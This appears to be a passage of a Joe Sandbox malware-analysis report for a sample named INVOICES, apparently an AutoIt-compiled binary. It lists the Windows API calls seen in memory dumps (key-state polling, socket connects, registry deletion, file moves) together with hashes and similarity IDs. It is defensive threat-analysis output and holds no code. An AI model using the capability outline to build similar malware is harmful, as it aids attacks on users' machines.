• Opcode Fuzzy Hash: b0fa3f0cdccce35807e0ab4ceac9d5c12d58360f0dc79f6cabb010aafe2230d3
• Instruction Fuzzy Hash: 8C41A666C20A28B5CB11EBB49C8AADF7778AF05311F108866F914E3122F67C9749C7A5
APIs
• GetCursorPos.USER32(?), ref: 00732357
• ScreenToClient.USER32(007F57B0,?), ref: 00732374
• GetAsyncKeyState.USER32(00000001), ref: 00732399
• GetAsyncKeyState.USER32(00000002), ref: 007323A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID: MZER
• API String ID: 4210589936-2424380061
• Opcode ID: 40fcd6716aa61db71de960f3bb3020ee7b44b8b75650f121e1124a1477808e06
• Instruction ID: a713c2c6a0f7ad2ddcc241d1b37c9f7bc4ba3ccba582faffbe204b89bfaa3948
• Opcode Fuzzy Hash: 40fcd6716aa61db71de960f3bb3020ee7b44b8b75650f121e1124a1477808e06
• Instruction Fuzzy Hash: 80418175904119FBDF1A9F68CC48BE9BB75FB05320F20432AF86592292C7386951DB91
APIs
  • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007936DB,?), ref: 007946CC
  • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007936DB,?), ref: 007946E5
• lstrcmpiW.KERNEL32(?,?), ref: 007936FB
• _wcscmp.LIBCMT ref: 00793717
• MoveFileW.KERNEL32(?,?), ref: 0079372F
• _wcscat.LIBCMT ref: 00793777
• SHFileOperationW.SHELL32(?), ref: 007937E3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 335b9893f9cb24aa04bed9b59d1b52708d98dc1324e4850989b4b18cee65d4d4
• Instruction ID: b17891255f16feda8567a5c2e9a619ec1b0782fbcb369e3a7126b0819e7d829c
• Opcode Fuzzy Hash: 335b9893f9cb24aa04bed9b59d1b52708d98dc1324e4850989b4b18cee65d4d4
• Instruction Fuzzy Hash: 644181B25083459ACB51EF64E485ADBB7E8EF89340F00492EB48AC3151EA3CD749C756
APIs
• _memset.LIBCMT ref: 007B72DC
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B7383
• IsMenu.USER32(?), ref: 007B739B
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007B73E3
• DrawMenuBar.USER32 ref: 007B73F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 405c4c7416de536656819044d506387172c8e2594230e24e3a967bd34f98349b
• Instruction ID: ed4829a318de3a76cf58fa8878bdbc0789776ef44b1993665409c359c8488aca
• Opcode Fuzzy Hash: 405c4c7416de536656819044d506387172c8e2594230e24e3a967bd34f98349b
• Instruction Fuzzy Hash: 08412575A04248EFDB24DF60D884EEABBF8FF48355F048129ED1597260D738AD51DBA0
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007B105C
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B1086
• FreeLibrary.KERNEL32(00000000), ref: 007B113D
  • Part of subcall function 007B102D: RegCloseKey.ADVAPI32(?), ref: 007B10A3
  • Part of subcall function 007B102D: FreeLibrary.KERNEL32(?), ref: 007B10F5
  • Part of subcall function 007B102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007B1118
• RegDeleteKeyW.ADVAPI32(?,?), ref: 007B10E0
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: b30e30e22f1f65b89f7791270a2172a727f1c37c603d66f8cdaa0c6f0290a8df
• Instruction ID: 2d5b0994cba1ed26b8f40f4f60a57a4dc0e4d34a49d27a2119d79cf85aa736b2
• Opcode Fuzzy Hash: b30e30e22f1f65b89f7791270a2172a727f1c37c603d66f8cdaa0c6f0290a8df
• Instruction Fuzzy Hash: 43311AB190110DBFDB159BA4DC99FFEB7BCEB08340F804169E501A2151EA789F859AA4
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007B631E
• GetWindowLongW.USER32(010C49E0,000000F0), ref: 007B6351
• GetWindowLongW.USER32(010C49E0,000000F0), ref: 007B6386
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007B63B8
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007B63E2
• GetWindowLongW.USER32(00000000,000000F0), ref: 007B63F3
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007B640D
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: d72f9da3898e0815c2c30e7e74d3171f9fc67815a905f3a47263214ded91d5a4
• Instruction ID: d15c578c753a23c39d37928b867f3dddc8c802280562789fbe3ae46b81e40d5c
• Opcode Fuzzy Hash: d72f9da3898e0815c2c30e7e74d3171f9fc67815a905f3a47263214ded91d5a4
• Instruction Fuzzy Hash: 6631E2316046509FDB21CF18DC88FA53BE1FB4A754F1981A4FA11CF2B2CB6AA840DB55
APIs
  • Part of subcall function 007A7EA0: inet_addr.WS2_32(00000000), ref: 007A7ECB
• socket.WS2_32(00000002,00000001,00000006), ref: 007A62DC
• WSAGetLastError.WS2_32(00000000), ref: 007A62EB
• ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007A6324
• connect.WSOCK32(00000000,?,00000010), ref: 007A632D
• WSAGetLastError.WS2_32 ref: 007A6337
• closesocket.WS2_32(00000000), ref: 007A6360
• ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007A6379
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 6ef38495b7ba672074600d8ad973b6d6940474c9afc6ab9a578aca6090852c7c
• Instruction ID: b5cafbab56135c04ec310175c9c7cce4f428bd7b38b53e4b7e98829e40f59830
• Opcode Fuzzy Hash: 6ef38495b7ba672074600d8ad973b6d6940474c9afc6ab9a578aca6090852c7c
• Instruction Fuzzy Hash: 5A31A771600118AFDF109F64CC89FBE77A9EB85720F048269F945972D1DB78AD05CB61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                  • Opcode ID: 038c127a9f3a79c6caa19b2202ae2b55b608e2c3a4fd7e69f5baaf391e5926f0
                                                                                                                                  • Instruction ID: c204df2d09fe5d62c4020abf24421b7444b731d2466bf1efb105f3173b097e89
                                                                                                                                  • Opcode Fuzzy Hash: 038c127a9f3a79c6caa19b2202ae2b55b608e2c3a4fd7e69f5baaf391e5926f0
                                                                                                                                  • Instruction Fuzzy Hash: 0B217C72188221A6D234BA249C06FB77398AF52324F508039F885C6082EB9DAD52C392
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00731D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00731D73
                                                                                                                                    • Part of subcall function 00731D35: GetStockObject.GDI32(00000011), ref: 00731D87
                                                                                                                                    • Part of subcall function 00731D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00731D91
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007B7664
                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007B7671
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007B767C
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007B768B
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007B7697
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                  • Opcode ID: 553b513a842faffb51e5d8b54f34451f7bf8cf268c29251b2d5ffe0c41824bdd
                                                                                                                                  • Instruction ID: f42e3d23452643b09a33e1317a6006a977d60aa126287f45a5ffe0bf21df0496
                                                                                                                                  • Opcode Fuzzy Hash: 553b513a842faffb51e5d8b54f34451f7bf8cf268c29251b2d5ffe0c41824bdd
                                                                                                                                  • Instruction Fuzzy Hash: 4C11B2B2110219BFEF159F64CC85EE77F6DEF08758F014115FB04A60A0C676AC21DBA4
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00754123
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0075412A
                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00754136
                                                                                                                                  • RtlDecodePointer.NTDLL(00000001), ref: 00754153
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 3489934621-340411864
                                                                                                                                  • Opcode ID: 464ed159f4882a08de536f37e312c7c61ab8a3db033ee3f64651871147eac148
                                                                                                                                  • Instruction ID: 8c40cebdd9099b23ad7918917110c5c28204f9bdbff7f8db8f2aa0c2963122ba
                                                                                                                                  • Opcode Fuzzy Hash: 464ed159f4882a08de536f37e312c7c61ab8a3db033ee3f64651871147eac148
                                                                                                                                  • Instruction Fuzzy Hash: F6E0E570790B08AAEB105B74EC09F643BA4A716B07F10C528F812D61A0DABD4585CB08
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007540F8), ref: 007541F8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 007541FF
                                                                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 0075420A
                                                                                                                                  • RtlDecodePointer.NTDLL(007540F8), ref: 00754225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 3489934621-2819208100
                                                                                                                                  • Opcode ID: 42c4324116814780b7b494304f507d201a52935f42228a303ef751b82cd68d24
                                                                                                                                  • Instruction ID: 72c546d97e01dd126e88907c103db2496f303e37aa0d617a6030cbf32a7c2570
                                                                                                                                  • Opcode Fuzzy Hash: 42c4324116814780b7b494304f507d201a52935f42228a303ef751b82cd68d24
                                                                                                                                  • Instruction Fuzzy Hash: C8E0B6B0685709ABEB109F61EC0DF543BA4B714B46F10C628F511E21A4CBBF9684CB19
                                                                                                                                  APIs
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 007A6D16
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 007A6D4A
                                                                                                                                  • htons.WS2_32(?), ref: 007A6E00
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 007A6DBD
                                                                                                                                    • Part of subcall function 0078ABF4: _strlen.LIBCMT ref: 0078ABFE
                                                                                                                                    • Part of subcall function 0078ABF4: _memmove.LIBCMT ref: 0078AC20
                                                                                                                                  • _strlen.LIBCMT ref: 007A6E5A
                                                                                                                                  • _memmove.LIBCMT ref: 007A6EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3619996494-0
                                                                                                                                  • Opcode ID: ec720cd60a8c3bc3496e6d01a7747385c7cae2c99428c211edb3548492d74d7e
                                                                                                                                  • Instruction ID: 5d720d77f2ffda109d4aeabaaf06e70eb52efc523a70dd664baa329896c9387e
                                                                                                                                  • Opcode Fuzzy Hash: ec720cd60a8c3bc3496e6d01a7747385c7cae2c99428c211edb3548492d74d7e
                                                                                                                                  • Instruction Fuzzy Hash: E681C175108300EBE710EF24CC89F6BB7A9EFC5714F188A18F5559B292DA78AD04C7A2
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                  • Opcode ID: 17187a60794a1330ccb19245ca6489b0361c186fca4493ddc51a656a333291e2
                                                                                                                                  • Instruction ID: f2024fe4b3661044444b3fe81c80c7279dbef1b88d92eede48b47e26606d65ec
                                                                                                                                  • Opcode Fuzzy Hash: 17187a60794a1330ccb19245ca6489b0361c186fca4493ddc51a656a333291e2
                                                                                                                                  • Instruction Fuzzy Hash: E261EE7050025ADBDF11EF64DC8AEFE77A8AF44308F044A18FD595B292EB78AD15CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
                                                                                                                                    • Part of subcall function 007B0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007AFE38,?,?), ref: 007B0EBC
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007B0348
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007B0388
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007B03AB
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007B03D4
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007B0417
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 007B0424
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                  • Opcode ID: a172809407808af83c3a4992436efcfe898e31fa8744618a6c38bf0c8bd14b0f
                                                                                                                                  • Instruction ID: 8ad5727a2cf39a13ef7d9550fbba718bede24368c8feb752593387a8c7ffb79c
                                                                                                                                  • Opcode Fuzzy Hash: a172809407808af83c3a4992436efcfe898e31fa8744618a6c38bf0c8bd14b0f
                                                                                                                                  • Instruction Fuzzy Hash: 15513B71108240EFD714EF64C889EABBBE8FF89714F04891DF585871A2DB79E905CB92
                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(?), ref: 007B5864
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 007B589B
                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007B58C3
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 007B5932
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 007B5940
                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 007B5991
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                  • Opcode ID: eaad609140dfbb730a992a16d2fd80d562273d0c5f93854be68c1c0fec21b922
